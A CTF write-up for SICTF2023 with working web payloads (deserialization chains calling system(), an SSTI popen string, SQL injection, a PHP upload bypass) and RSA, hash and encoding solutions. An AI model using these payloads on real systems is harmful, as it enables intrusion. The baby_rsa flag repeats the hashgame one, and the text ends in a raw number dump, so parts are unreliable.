SICTF2023 WP

news2024/11/15 12:38:46

Preface

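The last competition before the New Year. Thanks to shenghuo2 for providing the misc and crypto writeups; they solved every misc and crypto challenge, which is really impressive.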

web

兔年大吉 (Good Luck in the Year of the Rabbit)

Source code

<?php
highlight_file(__FILE__);
error_reporting(0);

class Happy{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}

class Nevv{
    private $happiness;

    public function __invoke()
    {
        return $this->happiness->check();
    }

}

class Rabbit{
    private $aspiration;
    public function __set($name,$val){
        return $this->aspiration->family;
    }
}

class Year{
    public $key;
    public $rabbit;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }

    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
}else {
    echo "过新年啊~过个吉祥年~";
}

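The target is the call_user_func call in the __call method. The only entry points are __wakeup() and __destruct(). If __wakeup runs, it calls die() and exits, so we enter through __destruct(). Inside its if statement, when key == "happy new year" it runs firecrackers(). That method assigns to the nonexistent property wish, which triggers __set in Rabbit. __set then returns the nonexistent property family, which triggers __get in Year. __get calls the object $name as if it were a function, which triggers __invoke in Nevv. __invoke calls the nonexistent method check(), which triggers __call. With cmd set, this gives RCE.

Chain: __destruct() -> __set() -> __get() -> __invoke() -> __call()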

poc

<?php
highlight_file(__FILE__);
error_reporting(0);

class Happy{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __call($name, $arguments)
    {
        echo "到达call" ;
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}

class Nevv{
    public $happiness;

    public function __invoke()
    {
        echo "到达invoke" ;
        return $this->happiness->check();
    }

}

class Rabbit{
    public $aspiration;
    public function __set($name,$val){
        echo "到达set";
        return $this->aspiration->family;
    }
}

class Year{
    public $key;
    public $rabbit;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    public function __get($name)
    {
        $name = $this->rabbit;
        echo "到达get";
        $name();
    }

    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

$a = new Year('happy new year');
$a -> rabbit = new Rabbit();
$a -> rabbit -> aspiration = new Year('1');
$a -> rabbit -> aspiration -> rabbit = new Nevv();
$a -> rabbit -> aspiration -> rabbit -> happiness =new Happy('system','ls');
echo urlencode(serialize($a));


//O%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7Bs%3A10%3A%22aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7Bs%3A9%3A%22happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7Bs%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3Bs%3A14%3A%22%00Happy%00content%22%3Bs%3A2%3A%22ls%22%3B%7D%7D%7D%7D%7D

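Note that key in Year must be set to happy new year. Because some properties are private, the serialized string contains NUL bytes (the %00 in the output above), so it has to be URL-encoded.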
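
A defender's view of the payload above, as an added example that is not part of the original writeup: the Python code below walks a PHP serialize() string without unserializing it, lists each class it would instantiate together with each property's visibility, and fails closed on anything it cannot parse. The function names and the allow-list policy are assumptions of this example; the payload is the PoC output shown above.

```python
# Added example, not from the original writeup: list the objects a PHP
# serialize() string would instantiate, without unserializing it.
from urllib.parse import unquote_to_bytes

# URL-encoded output of the PoC on this page.
POC_PAYLOAD = (
    "O%3A4%3A%22Year%22%3A2%3A%7B"
    "s%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3B"
    "s%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7B"
    "s%3A10%3A%22aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7B"
    "s%3A3%3A%22key%22%3Bs%3A1%3A%221%22%3B"
    "s%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7B"
    "s%3A9%3A%22happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7B"
    "s%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3B"
    "s%3A14%3A%22%00Happy%00content%22%3Bs%3A2%3A%22ls%22%3B"
    "%7D%7D%7D%7D%7D"
)


def read_int(buf, pos, end):
    """Read decimal digits up to the delimiter `end`; return (value, next_pos)."""
    stop = buf.index(end, pos)
    return int(buf[pos:stop]), stop + 1


def read_string(buf, pos):
    """Parse s:<len>:"<bytes>"; starting at pos; return (bytes, next_pos)."""
    if buf[pos:pos + 2] != b"s:":
        raise ValueError(f"expected string at offset {pos}")
    length, pos = read_int(buf, pos + 2, b":")
    data = buf[pos + 1:pos + 1 + length]
    return data, pos + length + 3          # two quotes and the ';'


def visibility(name):
    """Map a serialized property name to (visibility, plain name)."""
    if name.startswith(b"\x00*\x00"):      # \0*\0prop
        return "protected", name[3:].decode()
    if name.startswith(b"\x00"):           # \0Class\0prop
        return "private", name.split(b"\x00")[2].decode()
    return "public", name.decode()


def walk(buf, pos, found):
    """Parse one value at pos, recording objects in `found`; return next_pos."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                    # N;
        return pos + 2
    if tag in (b"i", b"b", b"d", b"r", b"R"):          # scalar or reference
        return buf.index(b";", pos) + 1
    if tag == b"s":
        return read_string(buf, pos)[1]
    if tag not in (b"a", b"O"):                        # C:, E:, garbage: fail closed
        raise ValueError(f"unsupported tag {tag!r} at offset {pos}")
    pos += 2
    entry = None
    if tag == b"O":                                    # O:<len>:"<class>":<n>:{...}
        length, pos = read_int(buf, pos, b":")
        entry = {"class": buf[pos + 1:pos + 1 + length].decode(), "props": []}
        found.append(entry)
        pos += length + 3                              # two quotes and the ':'
    count, pos = read_int(buf, pos, b":")
    pos += 1                                           # the '{'
    for _ in range(count):
        if entry is not None:
            name, pos = read_string(buf, pos)          # property name
            entry["props"].append(visibility(name))
        else:
            pos = walk(buf, pos, found)                # array key
        pos = walk(buf, pos, found)                    # value
    if buf[pos:pos + 1] != b"}":
        raise ValueError(f"expected '}}' at offset {pos}")
    return pos + 1


def objects_in(urlencoded):
    """Return the objects named in a URL-encoded serialized payload."""
    buf = unquote_to_bytes(urlencoded.replace("+", " "))
    found = []
    if walk(buf, 0, found) != len(buf):
        raise ValueError("trailing bytes after the serialized value")
    return found


def is_allowed(urlencoded, allowed_classes=frozenset()):
    """Policy check: accept only payloads whose classes are all allow-listed."""
    try:
        return all(o["class"] in allowed_classes for o in objects_in(urlencoded))
    except (ValueError, IndexError, RecursionError):
        return False


if __name__ == "__main__":
    for obj in objects_in(POC_PAYLOAD):
        print(obj["class"], obj["props"])
    print("allowed:", is_allowed(POC_PAYLOAD))
```

PHP's own unserialize() accepts an allowed_classes option that enforces the same kind of allow-list at the point of deserialization.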

ezbypass

Source code

<?php
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['code'])) {
    $code = $_POST['code'];
    if (strlen($code) <= 105){
        if (is_string($code)) {
            if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){
                eval($code);
            } else {
                echo "Hacked!";
            }
        } else {
            echo "You need to pass in a string";
        }
    } else {
            echo "long?";
    }
}

This challenge is essentially identical to the RCE challenge hosted by ctfshow.

Just see this blog post of mine:

https://blog.csdn.net/qq_63928796/article/details/127963079?spm=1001.2014.3001.5502

SSTI

Pressing F12 shows that the parameter is SI. Fuzz it with a wordlist.

[Image: image-20230120105850610.png]

Those with 242 are the ones that get filtered. After testing:

[Image: image-20230120105827700.png]

The filter can be bypassed by string concatenation, so constructing the payload is enough:

?SI={%print(""['__cl''ass__']['__bas''es__'][0]['__subcla''sses__']()[132]['__in''it__']['__glo''bals__']['po''pen']('cat ../ga1f').read())%}

ezphp

The challenge is a login form with SQL injection. Spaces and select are filtered; bypass the filter by doubling the keywords.

pass=1&user=-1'/**/ununionion/**/seselectlect/**/1'

This logs in to the admin page.

[Image: image-20230120110715835.png]

Entering anything shows the source code:

<?php
ini_set('open_basedir',".");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
if($_COOKIE['admin']!=md5('adminyyds')){
    header('Location:/index.php');
    exit();
}
echo('<h1>WelCome!ADMin!!!</h1>');
echo('this is a site test pages for admin! ');
if(isset($_POST['url'])){
    echo file_get_contents($_POST['url']);
    show_source(__FILE__);
}
else{
    echo('<form action="/admin.php" method="POST">
    url:<input value="" name="url" type="text">
    </form>
    ');
}
//x9sd.php
?>

The hint is x9sd.php, so read x9sd.php:

POST: url=x9sd.php

Viewing the page source then shows the source of x9sd.php:

class a {
    protected $cmd;
    function __destruct()
    {
        echo $this->cmd;
        @eval($this->cmd);
    }
}

if(isset($_GET['username']) && isset($_GET['unserx'])){
    $var = base64_decode($_GET['unserx']);

    if($_GET['username'] === "admin"){
        echo "nonono?";
    }
    $username = urldecode($_GET['username']);
    if($username === "admin"){
        unserialize($var);
    }
    unserialize($var);
    echo("success");
}else{
    echo "I need some ???";
}

The idea is to trigger __destruct() directly through deserialization, which then calls eval and gives RCE. Two simple if statements also have to be bypassed.

poc

<?php
error_reporting(0);
highlight_file(__FILE__);
class a {
    public $cmd = "system('ls')";
    function __destruct()
    {
        echo $this->cmd;
        @eval($this->cmd);
    }
}
$a = new a();
echo base64_encode(serialize($a));

//TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9

Then pass admin, URL-encoded twice, as username:

username=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65&unserx=TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9

ezupload

A file upload challenge; the source is provided.

<?php
    @error_reporting(0);
    date_default_timezone_set('America/Los_Angeles');
    highlight_file(__FILE__);
    if (isset($_POST['submit'])){
        $file_name = trim($_FILES['upload_file']['name']);
        $black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);

        if (!in_array($file_ext, $black)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;

            if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        }else {
            $msg = '你传啥玩意??';
        }
    }
    if($is_upload){
        echo '呀,(传)进去了欸~';
    }
?>

The key part is this:

if (!in_array($file_ext, $black)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;

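It stores the uploaded file under upload/. The file name is built from date("His") (the upload time), rand(114,514) (a random number from 114 to 514) and the file's extension. The time zone is set to US time at the top of the script: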

date_default_timezone_set('America/Los_Angeles');

[Image: image-20230120113046929.png]

This is the time.

Now look at the filter list:

$black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");

It does not actually filter .php, so a PHP file can be uploaded directly. Then note the US time of the upload and brute-force rand(114,514) in Burp Suite.

CRYPTO

Ascii

import base64
flag = 'a$HVZDZQ@TJUMGLVHZIYUF1U0NNYDURWWDNM6FFYP1OA[TRPHWJZ7R>>>>$'
flag_ = ''
# XOR each character with 3
for i in flag:
    flag_ += chr(ord(i)^3)

# drop the b'...' wrapper, then Base32-decode and Base64-decode
print(base64.b64decode(base64.b32decode(flag_[2:-1]).decode()).decode())

hashgame

MD5 applied twice (MD5 of the MD5).

To brute-force only once, I built a dict:

from hashlib import md5

flag_md5 = '''999a215b1f8372bb0f1c84c467a1506b
02b0b94ee1fa195ae7959560893f7e3c
297e7ca127d2eef674c119331fe30dff
65c162f7c43612ba1bdf4d0f2912bbc0
ed8a4ab0c0967b14e3bf6b145e153ec9
d24412e1ab190533176a653cef11b185
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
cd7fd1517e323f26c6f1b0b6b96e3b3d
a94837b18f8f43f29448b40a6e7386ba
dc0ae7e1387be9b795f5d6299e383759
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
011ecee7d295c066ae68d4396215c3d0
d7afde3e7059cd0a0fe09eec4b0008cd
39abe4bca904bca5a11121955a2996bf
a3655d5c04849a174d341b13d5cf5468
011ecee7d295c066ae68d4396215c3d0
28c8edde3d61a0411511d3b1866f0636
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
4c0d13d3ad6cc317017872e51d01b238
83be264eb452fcf0a1c322f2c7cbf987
4e44f1ac85cd60e3caa56bfd4afb675e
815e6212def15fe76ed27cec7a393d59
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
4e44f1ac85cd60e3caa56bfd4afb675e
ed108f6919ebadc8e809f8b86ef40b05
a94837b18f8f43f29448b40a6e7386ba
dcfcd07e645d245babe887e5e2daa016
665f644e43731ff9db3d341da5c827e1
83be264eb452fcf0a1c322f2c7cbf987
39abe4bca904bca5a11121955a2996bf
39abe4bca904bca5a11121955a2996bf
4c0d13d3ad6cc317017872e51d01b238
dc0ae7e1387be9b795f5d6299e383759
011ecee7d295c066ae68d4396215c3d0
5eccf232f5ebb3e780543372692fff18'''.split('\n')


import string
md5_md5 = {}
for i in string.printable:
    md5_md5.update({md5(str(md5(i.encode("utf-8")).hexdigest()).encode("utf-8")).hexdigest() : i})

flag =""
for i in flag_md5:
    flag+=md5_md5.get(i)

print(flag)

# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}

baby_rsa

N is the product of 234 primes.

Factor it with factordb and process the data:

import libnum
c = 44457399775772165283580795763046604956432217865936749114390645714446263790235445725770165521476841968764175721036280702731933849090719866149354613431301887740671003826556620460836983488011711209908075106260857650574672356032244606425941095128801765463716482316101398637519304864271794460829068714740938719022156283319142938782439784724450045931039355442034325311037568791297455084676548879770834712506552233840348850684727096270392080049993135041218143811167688449496243036317450681348089315258831745988434134987055263393540923865029931594717328162951158311497514418799360413513590684301435386737514918075848373373755748782672860711406169316940293554209702288482064854840802876490202123903888235028119047988176327629542924415737212649237787748145773301112682790682933658516724691338727523894513267588035437093188599375494920656327919129240066252636130803666175859640361767805549884909317548802917210333235914904622641997249853362378711924024129399688535136879208010081166848163897114124726692078532337827810846421365846926064892472698603597461932481745017020417072013702099809833423003201003030492
n = 157077292656328898849823499976497003976795705913326943955927601882559735301000546878663484930436631929909115065166613744548816622146802007640124796249330573411377703969505934904150600987843325674764620305047603408490558134670867673308099650843329640744997672015466571290660161290811275435569339606335117906571999000341133024698424364682800683662193063661214736762852739324479859236963365531207752799197178993887860855078852702337761399225640575281412171035871278933493943575572155382899938265639764715616686123949482372238288859715465115400317136714757882965887595246507450491169518000205087415380208167764110920711042584766805992237919576823121108078407699912757901788925718859790257450499775129521327827653298451904392241906547672843110356658889638496906522290674659574024024440113632175010053065452660076447040937842478007881589334096496073556056726805396937630799201696246079227214272205462258357482722478243481697053301054600954126539848778226175296162997813416634702496577009409960503948474494741296663849482119365434792563324547643352816519125305335959420429699475765642610737903235960423173
e = 0x10001

process = ['32771','33023','33071','33149','33343','33521','33863','33911','34123','34159','34231','34421','34499','34589','35089','35381','35831','35879','35969','36131','36523','36677','36871','37039','37159','37493','37691^2','37781','37951^2','37967','38219^2','38639','38821','38917^2','39019^2','39157','39343','39371','39703','39779','40087^2','40459','40471','40693','40867','41039','41161','41257','41263','41281','41387','41399','41443','41603','41771','41809','41863','41887','41941','42359','42373','42839','42899','43151','43207','43313','43391^2','43573','43613','43987','44087','44111','44207','44249','44281','44417','44491','44563','45077','45247','45281','45377','45943','45959','46147','46219','46439','46559','46853','47111','47681','47777','47857','47911','48259','48437','48479','48497','48593','48947','49103','49177','49193','49199','49363','49663','50047','50147','50261','50359','50383','50539','50833','51001','51109^2','51437','51593','51749','51787','52201','52379','52453','52769','52879','52937^2','53147','53717','53731','53917','53987','53993','54217','54311','54347','54377','54437','54469','54833','55049^2','55147^2','55249','55259','55291^2','55381','55457','55541','55661','55793','55967','56131','56149','56359','56501','56843','57037','57047','57131','57139','57413^2','57487','57571','57637^2','57803','57853','58057','58099','58147','58427','58537','58543','58679','58963','58991','59159','59333','59377','59417^2','59539','59611','59723','59743','59833','59879','59929','60029','60413','60427','60509','60679','61211','61379','61403','61781','61861','61991','62039','62297','62467','62581','62617','62683','63073','63149','63277','63331','63439','63659','63799^2','63839','63929','64217^2','64433','64679','64781','65239','65293','65497']

n_primes = []
for a in process:
    if len(a)==5:
        n_primes.append(int(a)-1)
    else:
        n_primes.append(int(a[:5])-1)
        n_primes.append(int(a[:5]))

phi_n = 1
for i in n_primes:
    phi_n *= i


d = libnum.invmod(e,phi_n)

m = pow(c,d,n)
print(libnum.n2s(m))
# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}

PolyRSA

We know that:

p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p * q

Expanding the product gives:

n == 18*k^11 + 9*k^10 - 20*k^9 + 396*k^8 - 2628*k^7 + 45494*k^6 + 710128*k^5 + 350749*k^4 + 281190*k^3 - 7079507*k^2 - 6323570*k + 1867478411

Since k = getRandomNBitInteger(64),

it follows that k = libnum.nroot(n//18,11)

import libnum

n = 2931835714514227696649197851452018066969814603905505893064829694548691616628661422451386639398824072768907608195113790730392677411502544741840786734616614308622423513064577929715025601090611378413475093510051291
c = 1162375069210804266034094584942794481470301602122091344590668656120128936761168164673823514232328715217241524062023457713973727518007443604233760475552174214966591823835585191443465256735930086309706593996639864

k = libnum.nroot(n//18,11)
e = 0x10001
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p*q
phi_n = (p-1)*(q-1)
d = libnum.invmod(e,phi_n)
m = pow(c, d ,n)
print(libnum.n2s(m))
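
The expansion and the root step above, checked in code (an added example, not part of the original writeup): it multiplies the two polynomials, compares the result with the expansion quoted above, and confirms on constructed 64-bit values of k that the integer 11th root of n//18 returns k. The helper names are assumptions, and iroot is a plain binary search standing in for libnum.nroot; the constructed k values are not required to make p and q prime, since the identity holds for any k.

```python
# Added example, not from the original writeup: verify n = p*q as a polynomial
# in k and show that floor((n // 18) ** (1/11)) recovers a 64-bit k.
import secrets

# Coefficients, lowest degree first, after merging like terms in the page's
# definitions (k**5 + 17*k**5 = 18*k**5 and -8*k**3 + 30*k**3 = 22*k**3).
P_COEFFS = [47527, -144, 0, -20, 9, 18]
Q_COEFFS = [39293, -14, -149, 22, 0, 0, 1]

# The expansion quoted on the page, lowest degree first.
N_COEFFS = [1867478411, -6323570, -7079507, 281190, 350749, 710128,
            45494, -2628, 396, -20, 9, 18]


def poly_mul(a, b):
    """Multiply two polynomials given as coefficient lists (lowest degree first)."""
    out = [0] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] += x * y
    return out


def poly_eval(coeffs, k):
    """Evaluate a polynomial at k with Horner's rule."""
    acc = 0
    for c in reversed(coeffs):
        acc = acc * k + c
    return acc


def iroot(n, r):
    """Largest integer x with x**r <= n, found by exact binary search."""
    lo, hi = 0, 1 << (n.bit_length() // r + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** r <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo


def recover_k(n):
    """n = 18*k**11 + 9*k**10 + ..., so k**11 <= n // 18 < (k + 1)**11."""
    return iroot(n // 18, 11)


def check_random_instances(trials=200):
    """Build constructed moduli from random 64-bit k and recover each k."""
    for _ in range(trials):
        # Exactly 64 bits (top bit set), like getRandomNBitInteger(64).
        k = secrets.randbits(63) | (1 << 63)
        n = poly_eval(P_COEFFS, k) * poly_eval(Q_COEFFS, k)
        if recover_k(n) != k:
            return False
    return True


if __name__ == "__main__":
    print("expansion matches:", poly_mul(P_COEFFS, Q_COEFFS) == N_COEFFS)
    print("k recovered on constructed instances:", check_random_instances())
```

Both factors are functions of one 64-bit value, so the modulus carries no more secret entropy than k itself, whatever its bit length.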

RRRSSSAAA

The hint is a dp leak, so decrypt the hint first:

import libnum
import gmpy2

e= 65537
n= 154243858720978602820118866455277758287334223654318945323956633685668127012462551649034724900534326698546179107853501584676890290935304784613676008667655919749627682648852472398117930471389759979432279103098572267738634433626627146280660185675121614094399255782089060202532182667463993275434746386786808729553
dp= 414447829724187823397808703878958757693775250832414113550357728233230359464880433113636330432984183165483109337095394192757735932571515450285102727598243
c= 107353143319003715532284973064969905174389167949274067058206046773012002421251301189097709121034091973243342582216724329271495555062882075119176838856174054763892910473175610614629226628025470613930226188506099489500606701109022668507012376482339056160636468427364776216626364765166621843217027512464383836160

# e*dp - 1 = i*(p-1) for some 1 <= i < e, so try every i
for i in range(1,e):
    p=(dp*e-1)//i+1
    if n%p==0:
        q=n//p
        break
print(p)
print(q)
phi_n= (p-1)*(q-1)
d=gmpy2.invert(e,phi_n)
m=pow(c,d,n)
print(m)
hint=libnum.n2s(int(m)).decode()
print(hint)

This gives Alpha == 8.

p = getPrime(512)
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)
n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2

gen_num behaves like a nextPrime function, so q, r and s in n can be approximated in terms of p:

n = p**8 * (p*8)**(16) * ((p*8)*16)**(32) * (((p*8)*16)*32)**2
n=127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336*p^58

So p is approximately libnum.nroot((n0//root),58).

Then find the nearest preceding prime:

def prePrime(x):
    while True:
        x-=1
        if isPrime(x):
            break
    return x
p = prePrime(libnum.nroot((n0//root),58))

Then recompute n following the original construction; the resulting n is correct.

import gmpy2
import libnum
from Crypto.Util.number import *

def gen_num(x):
    while True:
        x+=1
        if isPrime(x):
            break
    return x

def prePrime(x):
    while True:
        x-=1
        if isPrime(x):
            break
    return x

n0 = 510598540378970007468346322989879190780475356832709189528874695730531468123747091318830966440138615736420891392158097533731041150162690662471483619765171875053776526546923686545162088172326434280369545887080098691661618888498451216122577703462656147845476260802989936275927468143618457014875124540773380472942489037761179303561650189545290190421786318533073909424735517884608967725919128200358535113829753453601297612782921831305721998858231417374167746154206561475003022801732102170674160043866579234096945753255309604584663823273990392197858273029361669185072049422597132579136784027822968387907216366150999438414498332890674564920800382005582891491049365978733797356415518435343495821039314228388769356638637099572998812062355774848959446125701462950655806332002764535951282449862140062574418031213788534096501985200284615865248974807525604893147298611402252296159828500266098282909607218395957805357667923653409828275804406466185333491486073920384298557332939701611488655278812282652143513835104674009767479927241052662403578967182673338296967573503287747778401579267126898937724971226916836862238412923209155792382534204896050548824028658237640251964366961727999178646613907934616655737902329568420682808750546571786374023614255135110482419627491157502417864563832543812083026753673687664854910877686333766643694031564516722983669199704788291656757271915091399977189663329054202997146978631991467923388119989473941572476162990901960011968892272676827771256008656450296183884491251752111424531449198118292179798490440493223653950102915889401116251591885909790869073018774674246846164536910633015902964911907187085243240032540938841961345835517368130042501382327926289017383981908729734129193302049155793436988510517701765733605569135643208447952662352778482137713239592896997102366230279153456455232519301534222340901671138239539845240151878610363390683459663471954623868659324304077587611084188341121303918876492043578883059738615210439439368338460631574255417822627815523601923537626576677
00408501787586092880276217647781528484093695114217653276851772863656225624066840952518488614280180282545146544099345702277107795709422895759212231968221629450933826273987216348297250899170252528936110597157465912612729623324790550549652568381771136670474661702774488941390468486757708166713718762382534941022938948419960873986422103598527768130738993984840579029447387862209220083775316110169553994751461472769995220011454436205187393850559146924046537909137783729756132329739351815252451394829447577077487259660134552646959048603738676796481263161822452723385081890934600744975677970731960991512761882855191068142164730718039963285724886765583689496813445762298795478168566483395177498138391401342072463767678790749849061986548870654242214133875493347619031365353073982202970021785753424347368058515026352394789150134144137196543585147967088220299295593527993365235633627025159132462389809498411919075277523600505740525794503803138286751182217312200130950572852659689392644529171203511755363758919029281600177055412984032683288870754199945479165374264787969458532911269738215144792369177080932780766537601411455262628528929180803284554490535638049722762273874630768561114048387517783951192297765704568035372367279241166148924216264627210564997035913427749990720790614957329999003385894321580195412644869346010277541822529325540275815943194381187237368205316094488777537546597143232096455494737731855451827585430309942099999269099091680175718485384747437962117797692668197737192219172208516491043003217732095434198698452359458317247060974397024581096985851263259794372162816572432944751682315938773422028251018595976823963001716211507275841917705657178107514837482272189968372048835604109624856388054775271028915151260708703831064923561068825505918246796437954413407076664686381577557604910633795534515005515181302853469006677110418841829644006730335541721082944097885859930648736162672393288367540470531964987763128946554759722590893442030486704834169830894043637737558890546354919956880078813032465
30743988910972239583927035151809584667713955665679236304408819867811200627693279931371517831898115707143912641550608407310294665934058537218339713038218041043828006736317867297447791653714332112673610248965760315569797710076932151985472965822351675821064197795806932252116952154065400254681412352411683875279018517749938670557406928359311153126595007137016529058023579519932909790991701591670091065340012268595338360828012299973379669725791865487711690996466561728824240894512730212938210261732106650957828027098749466419621155258413253003185246653865114216628604906208195613381106237748423403800689224156091373584488991265532798949506048718892085798867789991744055821605764795543242088760820339120317370862481218993037307814981565972498039271422354446444813880644861554319120036410956749499034041768108663075715313896377941478710129041346535693884936524414327590923367522289397641103970298313878039433948115583861228395681589284610075782599687657270925770065882648679604864720144937746640814071867213518528835271457905752422856646593039488422287665542439666913964923911525818300221338144541962599686557353617759147053322588929546142722444525184492604893485044492044614189717680113843402732912320941765722328370386704678538976658778514349925574290175042293377784700808934494234054916075876354383314765729962014826335872714790019157681823368134174601452729107804200627730572893521270586060484283151856245545511721521063544452405903801407563552263768294430681906723297768321121733220111378625905487216760593983796949945227944747745345795461096776152576967039504973328242995760691963302716664597584305420519690936808467656616854895564798250155054605855773883000050302405144486177152766008742906644168881845571425422070298270163626869248837043978741294122679494167334920808433155199129430480418806654426645349803706890812669084970510772371882217520590589128356176356910618044810359083177652799372175914326328326788064303813253400008989586804686941829931892080394597123914924101233868843405046482968159169
80264240229859574883155040793388439699245314010536014311134726579595932201351264754211113984594974123575279085420654342347792446273359397655783349850267895960713020361459104930811498666622216299579774939159380045958811891996366190154624989040001455252320159516822116133341010157165599727635333348456688307169980804760876207246783116588952529877373514768545007418968307885769960168050996962066803264260375707466369627458024513973771207018864983698407016663019106354023164759250846073414341438963394719456500998324900154652118420207057668806120330181700845296117532235012372135050553397046174401449323031309344766628888675704109715329046692002106076405553528413866402862565543443907259825033515101841485790388106868972724754988229771779715569516295419556055234476868558577442887306482605945053829666543946452255290321024138948999088611233226734197091325915223296133751626031378197131875533631358612215053149934608672729194446883476706267066475008836864936670808320239466055935088929279252129128009704233352664523535820092988950793050907265677092793104426094212209504897403359406325045852228354350509453013015487815230129380079713113632363881496974185547766115624580099624722897692297760495094913178120692467666707678647081180656345151015995338390986674404981831649353833607305738823436744297628382797810952028446046016233612873716789383675779820186248250486000672269630344269347652027789034023080859790238772676504723029078903218723114249502157501775936110552413022658586833869562215506206204712447588632398550497708640229614956652263449460598992811393334042395804931240940416629178335447861485028284981615219874331354750385150254017244750993573994159458909546341067039268159319391512934162794663414200907868505060542602841564239761181077333990423542820064315891665379550720216448942932714180923613869070005330476506812100063599659432570925437054287120906048730323556681557905787470647037629769660028387819741611799183349496549168370221978146678987457271259655273299546276899538032070218474555442304430
064164467753804089753466882786069297036926063093020795423414152340563079346797084488827259011515774643776620378827875819192074121522712821147817374988804339999134520633699074448564057555026364304855373068414955699295158212425760345481057281658337956841137897162198027254556350868502178340964817530029135654659162400076087528650997151875596189190736466304722028587441680622878918057024286243448077104494316372739218635221411755498456912672491099154558604384574583302548226057069534004474532514444674565766058970748694657151540644416463532338966570743112669782840065402131461088637463019996192189423665651801811614499041923273110971446683450048861113332787126098622974613883291506736280588039145040361795192519576202306796277888696719887642051327259799873478040156450250036778305950744573270786882726162630115640020293415918210448873867037875790399234972055537649774407094382744621251926131880807765203843946682834221238903263352845265134368550124026502981782369374484091775137498831749984649699756860976525160646445060537001
